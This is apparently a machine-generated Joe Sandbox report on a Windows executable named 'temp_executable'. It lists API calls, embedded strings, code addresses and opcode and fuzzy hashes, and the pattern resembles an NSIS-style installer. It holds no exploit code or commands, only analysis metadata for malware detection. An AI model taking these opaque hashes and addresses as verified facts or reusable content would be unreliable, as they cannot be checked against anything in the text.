                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: *?|<>/":$Error writing temporary file. Make sure your temp folder is valid.
                                • API String ID: 589700163-525015898
                                • Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction ID: 6d5cd2c23b7c5e8a6660ed42317bbe46aa043e331069955b4164b8205da208bc
                                • Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
                                • Instruction Fuzzy Hash: 9E11D261B0063556DA3067298C4097B72E8DFA97A1756443BFDC6E72C0FB7C8CA193AC
                                APIs
                                • lstrlenW.KERNEL32(00424200,?,00000000,?,?), ref: 00405D47
                                • lstrlenW.KERNEL32(?,00424200,?,00000000,?,?), ref: 00405D59
                                • lstrcatW.KERNEL32(00424200,?,?,00424200,?,00000000,?,?), ref: 00405D74
                                • SetWindowTextW.USER32(00424200,00424200), ref: 00405D8C
                                • SendMessageW.USER32(?), ref: 00405DB3
                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DCE
                                • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                • String ID:
                                • API String ID: 1759915248-0
                                • Opcode ID: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction ID: ac3c7827115ee855a696472e6a70c5e4fb7cac6e51cf912ccc90d208c1262af9
                                • Opcode Fuzzy Hash: abf7321ecfe745b46f7b8ea960bd9c265c0882f09d776aa47d2a89f6dad764dc
                                • Instruction Fuzzy Hash: 7B21F571A056206BD310AF55AC84A9BBBDCEF94350F44443FF548A3291C7B89D008AAD
                                APIs
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                • GetMessagePos.USER32 ref: 004056D6
                                • ScreenToClient.USER32(?,?), ref: 004056F0
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction ID: 0216f53b5c1e39ec49102949a755e2bc9d8ef7e3372eb4174345f74bd41e4177
                                • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                • Instruction Fuzzy Hash: C3014C7194020DBBEB01AF94CD45BEEBBB9EF44710F10412AFA50BA1E0C7B49A41DF54
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00403648
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403670
                                • wsprintfW.USER32 ref: 00403680
                                • SetWindowTextW.USER32(?,?), ref: 00403690
                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                Strings
                                • verifying installer: %d%%, xrefs: 0040367A
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction ID: 23416ea20b8bc991085432565deaec88b6a19029d37e317e26b4fa0cf66bde53
                                • Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
                                • Instruction Fuzzy Hash: F7016D71540208FBEF24AFA0DE86FAA3B69AB04305F00853EF646B51E0DBB99554CF5D
                                APIs
                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                • wsprintfW.USER32 ref: 004061CC
                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                • String ID: %s%S.dll$UXTHEME$\
                                • API String ID: 2200240437-1946221925
                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction ID: b03dfa9df8f17b5f94e80c11c2028c51dcc2a5658fc7e28beebe443f54a48520
                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                • Instruction Fuzzy Hash: 07F0BB7150161457D710BB64DE0DB96366CEB00304F54447AA646F62C1EB7C9A54CB9C
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                • GlobalFree.KERNEL32(?), ref: 00402C7E
                                • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: d8233fe099ea2af2e0409c8d0dbaade6ee1264d4a1629dae062558262f167142
                                • Instruction ID: 686b8f33fe839f6b04a80afc83e47d853b1ea01e990ec980acb486ddfed3f61f
                                • Opcode Fuzzy Hash: d8233fe099ea2af2e0409c8d0dbaade6ee1264d4a1629dae062558262f167142
                                • Instruction Fuzzy Hash: 1E310871408351ABD310AF658E49E1FBBE8AF89754F114A3EF590772D2C77888018B9A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$@
                                • API String ID: 3446177414-1194432280
                                • Opcode ID: 5609c342473bcb0603ccd76556bd580c19dba2451212973b6146fea5e979466a
                                • Instruction ID: aac20f4e9d0a9c56079c74e7ff9c0d66713d13b0ee2783576a221b35204d143d
                                • Opcode Fuzzy Hash: 5609c342473bcb0603ccd76556bd580c19dba2451212973b6146fea5e979466a
                                • Instruction Fuzzy Hash: 40812BB1D002699BDB21CF55CC45BDEB7B8AB48714F1045EAEA09B7350DBB05E85CFA0
                                APIs
                                • GetTickCount.KERNEL32 ref: 004031B6
                                • GetTickCount.KERNEL32 ref: 00403245
                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403275
                                • wsprintfW.USER32 ref: 00403286
                                  • Part of subcall function 00403131: SetFilePointer.KERNEL32(00000000,00000000,00000000,004035B2,?,?,?,?,?,?), ref: 0040313F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountTick$FilePointerwsprintf
                                • String ID: ... %d%%
                                • API String ID: 999035486-2449383134
                                • Opcode ID: 05e5243707f5f7ace503ab87713e90cbe87e1f5fe0e9427802214610f79e4a99
                                • Instruction ID: b14d6756c9ad048cc293c005f1ed80a68e2f1ec6eb458bfd39e289cb7134058b
                                • Opcode Fuzzy Hash: 05e5243707f5f7ace503ab87713e90cbe87e1f5fe0e9427802214610f79e4a99
                                • Instruction Fuzzy Hash: CB516E716083429BD710AF269A85A2B7BD9AB84345F044A3FFC55E32D1DB38DA048B5E
                                APIs
                                Strings
                                • Querying the active activation context failed with status 0x%08lx, xrefs: 32DB3466
                                • LdrpFindDllActivationContext, xrefs: 32DB3440, 32DB346C
                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32DB3439
                                • minkernel\ntdll\ldrsnap.c, xrefs: 32DB344A, 32DB3476
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                • API String ID: 3446177414-3779518884
                                • Opcode ID: 44010c2e45ac82a98f5cff504b9b2b3da97dcf824006c906f8ae1846ca876373
                                • Instruction ID: ca02286a7fbf5f8f3f5abf415d0ad5d2ed0f29f7a013c1c219c31f2bddd7daad
                                • Opcode Fuzzy Hash: 44010c2e45ac82a98f5cff504b9b2b3da97dcf824006c906f8ae1846ca876373
                                • Instruction Fuzzy Hash: 4631F5B6A01355AFFB139F0C8845B56B3B4AF41399F86816AD9C067750EFA89CC0C6F1
                                APIs
                                • GetTickCount.KERNEL32 ref: 00406A4D
                                • GetTempFileNameW.KERNEL32(?,0073006E,00000000,?,?,?,00000000,00403CAF,00436000,00436800,00436800,00436800,00436800,00436800,76073420,0040399D), ref: 00406A68
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CountFileNameTempTick
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$a$n
                                • API String ID: 1716503409-3838866546
                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction ID: b372954d90286b94022032574b0bf3fdd655f2b9327b001c14c93946e7bfd4ef
                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                • Instruction Fuzzy Hash: 1CF0BE72300208BBEB109F44DC09BDE7779EF81710F11C03BE941BB180E6B05A5487A4
                                APIs
                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                • Opcode ID: f177ed344ea6fd50dbffeb88da14f1b34f7d576460257365899ecec5bb3fd5f3
                                • Instruction ID: 4f1e1c459a9a950a7738efb8d65c2f41013d72b2fa1f43b4319387a01f4f2cce
                                • Opcode Fuzzy Hash: f177ed344ea6fd50dbffeb88da14f1b34f7d576460257365899ecec5bb3fd5f3
                                • Instruction Fuzzy Hash: FD216032108244BBD7219F51DD08FABBBADFF99354F01043EF989A11B0D7359A149A6A
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                • Opcode ID: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction ID: a1357e6e01c620789306e575287b66343fc6a42a857d7aaea03cc6a10a526d0d
                                • Opcode Fuzzy Hash: 7f9423f384d93fc0e3e6fbc7cac958838f77b0a9d1a07732a5146b80b1a3c62d
                                • Instruction Fuzzy Hash: 1C21B6726093029FD340DF64DE84A6BB7E8EB88304F04093EF985E62A1D778D840DB59
                                APIs
                                • GetDC.USER32 ref: 00401FB9
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                • String ID:
                                • API String ID: 4253744674-0
                                • Opcode ID: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction ID: a293f1e503c12f3834b95d63be9809c732b55947eac1385e5f26d009a2b4f9be
                                • Opcode Fuzzy Hash: 9f2a315a86747fca2e42ee02dfd95963893f875b0ab85644b2b496c98eb1a616
                                • Instruction Fuzzy Hash: 5401D473144780EFD300BBB49E8AA563BE8EB55706F10893EF685B71E1C9784109CB2D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 3446177414-3610490719
                                • Opcode ID: adc8fc1d56cd73153df1a6cbc6a5365dfe743bf3dbc1561062849a07260be935
                                • Instruction ID: 231132e9ecc46c8a69badd5a50099d2d88a4f4562250be8704e5a423d206998f
                                • Opcode Fuzzy Hash: adc8fc1d56cd73153df1a6cbc6a5365dfe743bf3dbc1561062849a07260be935
                                • Instruction Fuzzy Hash: 5291E175206745AFE31ACF24C884B6EB7A5AF44744F00055AFA849F781DFB4E881CBA2
                                APIs
                                Strings
                                • Failed to allocated memory for shimmed module list, xrefs: 32DA9F1C
                                • LdrpCheckModule, xrefs: 32DA9F24
                                • minkernel\ntdll\ldrinit.c, xrefs: 32DA9F2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-161242083
                                • Opcode ID: 9a0abba95785c6a090d98583d51cd69183dade92b2325893ada56093e953124f
                                • Instruction ID: c88003eafc1907b88af608e5d41c7f7a71da3ecf6664b7294717c6d358fcf261
                                • Opcode Fuzzy Hash: 9a0abba95785c6a090d98583d51cd69183dade92b2325893ada56093e953124f
                                • Instruction Fuzzy Hash: 0471F575A002099FEB04DF68D991BBEB7F0FB44309F948869E946E7350EB749982CB50
                                APIs
                                • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                • wsprintfW.USER32 ref: 00405607
                                • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                APIs
                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                • GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • Part of subcall function 00406179: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406190
                                  • Part of subcall function 00406179: wsprintfW.USER32 ref: 004061CC
                                  • Part of subcall function 00406179: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                 • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                • API String ID: 2547128583-890815371
                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction ID: 8df058e233f66e35bffb69da01c296363a0ab298929cdf7fbd230430fe9e2c9f
                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                • Instruction Fuzzy Hash: BAD05B371022159BC7012F62AE0895F776DEF56351705443AF541F7270DB38D82295FD
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c0949f6969620e81bfb2dc172556b9175a7148074cc74a4f480d32e88344c06
                                • Instruction ID: 08b7dfaab3b10a37f118ebcb2041a118e00a826200f0a676fbdd83e5078e146c
                                • Opcode Fuzzy Hash: 1c0949f6969620e81bfb2dc172556b9175a7148074cc74a4f480d32e88344c06
                                • Instruction Fuzzy Hash: 65E1F174D00708CFDB25CFA9C980AADBBF1BF48348F60456AE956AB360DB75A941CF50
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,?), ref: 00405E5A
                                • GetLastError.KERNEL32 ref: 00405E64
                                • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405E7D
                                • GetLastError.KERNEL32 ref: 00405E8B
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                • String ID:
                                • API String ID: 3449924974-0
                                APIs
                                • DestroyWindow.USER32(?,00403554), ref: 00403375
                                • GetTickCount.KERNEL32 ref: 00403394
